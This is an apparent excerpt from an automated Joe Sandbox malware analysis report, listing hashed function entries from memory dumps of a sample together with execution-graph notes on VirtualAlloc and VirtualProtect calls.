                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7095cc7f374979e24623bfe24995d493e946eba813fab6c47190232b2df4ab49
                                                                                                                                      • Instruction ID: e8223933e4b58500a1fa8c459c32049b07d46802e10036b51b581d7459f2ef9c
                                                                                                                                      • Opcode Fuzzy Hash: 7095cc7f374979e24623bfe24995d493e946eba813fab6c47190232b2df4ab49
                                                                                                                                      • Instruction Fuzzy Hash: 5B01FB7091868D8FDB91EF68C959A993BF0FF69300F4501E7E418C7262D634D554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA840 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction ID: 67814f8608110dbd8af8a14e58ad2d40f419479488908825857ada116beaab6e
                                                                                                                                      • Opcode Fuzzy Hash: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction Fuzzy Hash: CFF068B090464E9FEB55FF6884596F977E0FF28301F5005B7E81CC25A1DA346190CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC529 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction ID: 024fe9052e7497a436231e6f6d3c1961b2c317edd63609164fa037ddf95308d8
                                                                                                                                      • Opcode Fuzzy Hash: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction Fuzzy Hash: DCF0CDB190E7C94FE7669B644C791A43FA0FF56300F0A05EBE45CC71E3D9199954C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8962AD Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction ID: 97dd3f907e22862dc1ec1384590def3c0e1e7a5c2525b5200195e096127bc343
                                                                                                                                      • Opcode Fuzzy Hash: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction Fuzzy Hash: BEF06D7090968E8FCF92DF58C895A993BA0FF69340F0502AAE41CC71A2D774E964CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9C5E Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction ID: c181dff1414412c58870333471d4a10c9ee915101c2f5a4f66a7d5cd1be1f47c
                                                                                                                                      • Opcode Fuzzy Hash: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction Fuzzy Hash: D0F03C3091978D9FDB559F7488685A97FF0FF09204F4544EBD808C61A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B04F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b0000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction ID: 327074ae39ff5c3e932352623ea41117dcdd2ccab5956ff2ecde4c4049c9bf0b
                                                                                                                                      • Opcode Fuzzy Hash: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction Fuzzy Hash: CA018C7091D78D8FDB56DF2488A9AA97FF0FF19304F4500EBE808C62A6D6389594CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896ACD Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction ID: f0cd4c5949e007dfb337b2a0df2b9340da400600cc0c9508ea392d2325d53a42
                                                                                                                                      • Opcode Fuzzy Hash: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction Fuzzy Hash: 25F06D3050A68DCFCF95DF18C865A9A3FE0FF29340F0501A6E418C75A6D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CB2A9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction ID: dbb5e94b4afeafcadb94eff081683a56e029ed68a3bbbf9b277fee56d2bd1c39
                                                                                                                                      • Opcode Fuzzy Hash: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction Fuzzy Hash: 57F0F67190A68D8FEB11BBA048692F87BB0FF15300F4548F7E41CC21E3ED281144C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C4586 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c4051ce70141519c4f602f01eca22b4c7df2576476f9f005f1dd36f48a044309
                                                                                                                                      • Instruction ID: 9bf07051029ad7c5ffd28180e55cc9dd9ef409a274ebd057e2cd9d514569b3c0
                                                                                                                                      • Opcode Fuzzy Hash: c4051ce70141519c4f602f01eca22b4c7df2576476f9f005f1dd36f48a044309
                                                                                                                                      • Instruction Fuzzy Hash: 4E01C974A0550CCFEB64EF84C494FA8B7B1FF59315F1541AAD419EB2A1CB75A981CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9D59 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction ID: 146f51af0ea56b3cf4e94149412cccdb2974714daba32c4b057c8338e7a27461
                                                                                                                                      • Opcode Fuzzy Hash: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0547191978C9FDB52AF7488686E97FF0FF15200F4604E7E418C71B2DA349654C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896105 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction ID: 37c4e285f216517c9e48b90ec61dd197cfa2dac02dd6b188a8309e5e7aece153
                                                                                                                                      • Opcode Fuzzy Hash: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction Fuzzy Hash: 74F08C7194A68D9FDB91ABA488A969D7FB0FF18300F4506BBD448C61A2DA3492948701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B5ECF Relevance: .0, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 14984dfd4bbf2f8cb9a1953eff2ca1a176d9c85ae93cdc8383431d59b63532ef
                                                                                                                                      • Instruction ID: 845a4b161d79086b2309dd2881b14d785eb7994c294a66d4d2eb10131d516dea
                                                                                                                                      • Opcode Fuzzy Hash: 14984dfd4bbf2f8cb9a1953eff2ca1a176d9c85ae93cdc8383431d59b63532ef
                                                                                                                                      • Instruction Fuzzy Hash: D0F01C71E1565D8FCF88EF98E4A19DDB7B1FF58300F1100A2E81CE725ADA30A9418B80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89664D Relevance: .0, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction ID: 0780af3514576b6cf5bdcb99d851e067e45723f2029fbc2018b7df116e2f2530
                                                                                                                                      • Opcode Fuzzy Hash: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction Fuzzy Hash: 14F05C70E4D10A9EDB05DF94A4624FDBB60DF46300F204479D81CD31D7DD3412418681
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF692 Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 495c043865cd8c97b49a35b5fb31f4896acfa5a9d55b9fe5f4bbe6bfea97bc3f
                                                                                                                                      • Instruction ID: 3554e9c5eb83cdf75cc499686e25ddc879ee0089a24da474b14a782b08b91954
                                                                                                                                      • Opcode Fuzzy Hash: 495c043865cd8c97b49a35b5fb31f4896acfa5a9d55b9fe5f4bbe6bfea97bc3f
                                                                                                                                      • Instruction Fuzzy Hash: 15F0EC70E0550E8FEB14EF84C4647FC77B1AB5C319F15413AC015A62E4CB79A988CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D0115 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction ID: d8cdbc9fa8ab1dd57462dd35c568cd550ea0f0b09558d317de7ffdb5c814b746
                                                                                                                                      • Opcode Fuzzy Hash: 394cc23d32773e729b1488561120bd534591fc6c0af0e48a9fa065b4cec9f660
                                                                                                                                      • Instruction Fuzzy Hash: 1EE0923195E38D8FDB269F7088665D93FA0FF45304F0606BAD458461E6EA68AA24C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89E2AA Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction ID: abf02cccf1b7f8c885843eab26038be62658b2b2a60f9951619bf0f29e0ff77e
                                                                                                                                      • Opcode Fuzzy Hash: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction Fuzzy Hash: 87F0DA30E4915E8EFFB09BE484583ACBFB0AF1C302F22407AE40DD65A5DA3866848F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA1DD Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction ID: 16c3ed72f3c4d39044c099b7ed734c8d44601ef8a3dfe3f04e9aba38f69960f5
                                                                                                                                      • Opcode Fuzzy Hash: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction Fuzzy Hash: 9CF0A07091A28D9FDB51EF608A206ED77B0FF05300F4504E6E028C32A2DB389618D741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B882171 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 61140f1df491b8f547f654c528ba581d7a4351083913b5fd61ffa9837d6770a2
                                                                                                                                      • Instruction ID: f6792a6c1c1ff4b9c5bbebec4e860ac109e6f34f4d2ef430a2c38895b81b1c36
                                                                                                                                      • Opcode Fuzzy Hash: 61140f1df491b8f547f654c528ba581d7a4351083913b5fd61ffa9837d6770a2
                                                                                                                                      • Instruction Fuzzy Hash: 03F0DA74A1991A8BE7A8EB18CC646E867A1EF98344F0041B9901D935A5CE346E818B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF57D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a1d0e800955657eb0fe48ff41d0b92f8f9d4fb002e5497b84ae150b53283670
                                                                                                                                      • Instruction ID: 410e16134fad39718abc3046483744791044b2294416c8c5b8e6498beb12727e
                                                                                                                                      • Opcode Fuzzy Hash: 3a1d0e800955657eb0fe48ff41d0b92f8f9d4fb002e5497b84ae150b53283670
                                                                                                                                      • Instruction Fuzzy Hash: 7FF0FE70A0450D8FE714EF84C4647F877B1EB58329F14413EC415A72E5DB79A984CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C9C9D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a68b4ddc9dfaa1bd11658119ad107a644a9d6ff2af0e9f2acbe00c6c664678db
                                                                                                                                      • Instruction ID: 4f8a02afc3d1353eaddceece3ed1075bf80d57abe01d0839c4d99feaf2155b08
                                                                                                                                      • Opcode Fuzzy Hash: a68b4ddc9dfaa1bd11658119ad107a644a9d6ff2af0e9f2acbe00c6c664678db
                                                                                                                                      • Instruction Fuzzy Hash: 0CF0F870A0411D8FEB55EF80C858BF973B2FB59320F10077AC409A72D5DB796684CB44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88A1E2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction ID: 2a9cce8ef03432b02c27bed38e24ea2f9db93362f2a2681169a626367e4c1cc5
                                                                                                                                      • Opcode Fuzzy Hash: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction Fuzzy Hash: B0F0D470D0A62D8FFBB4AB64C968BE9B6B0EF58300F1100F8C15DA2391DE395AC4CE01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89D94E Relevance: .0, Instructions: 18COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8ea81d9a5c01908a963c0d3cfc0aa9380e4b7b9eb71e432e8b9c1dac4d177ba5
                                                                                                                                      • Instruction ID: e7d57d85804cb51903967511dec6c3be86c0f37f68b41fc99af3b2b2c40fd6eb
                                                                                                                                      • Opcode Fuzzy Hash: 8ea81d9a5c01908a963c0d3cfc0aa9380e4b7b9eb71e432e8b9c1dac4d177ba5
                                                                                                                                      • Instruction Fuzzy Hash: 3DE04F61A0461A8BFB58AF48C8915AD6FB1EF44200F400135C41D871D5DE342542C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9B894E90 Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$($)$+
                                                                                                                                      • API String ID: 0-687716160
                                                                                                                                      • Opcode ID: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction ID: e8f7a8636b4bd24637bff69abf59f12d483bff6b92003487f846a2a6bb2f06c9
                                                                                                                                      • Opcode Fuzzy Hash: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction Fuzzy Hash: CE21F330E06A2D8FEBB9DF54C8947E9BBB5EB49301F1041E9C00DA2291DB746B888F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:6
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 16098 7ffd9b8b1e1d 16099 7ffd9b8b1e81 VirtualAlloc 16098->16099 16101 7ffd9b8b1f55 16099->16101 16094 7ffd9b8b03fe 16095 7ffd9b8b040d VirtualProtect 16094->16095 16097 7ffd9b8b054d 16095->16097

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B8B9FAF Relevance: 5.1, Strings: 3, Instructions: 1351COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
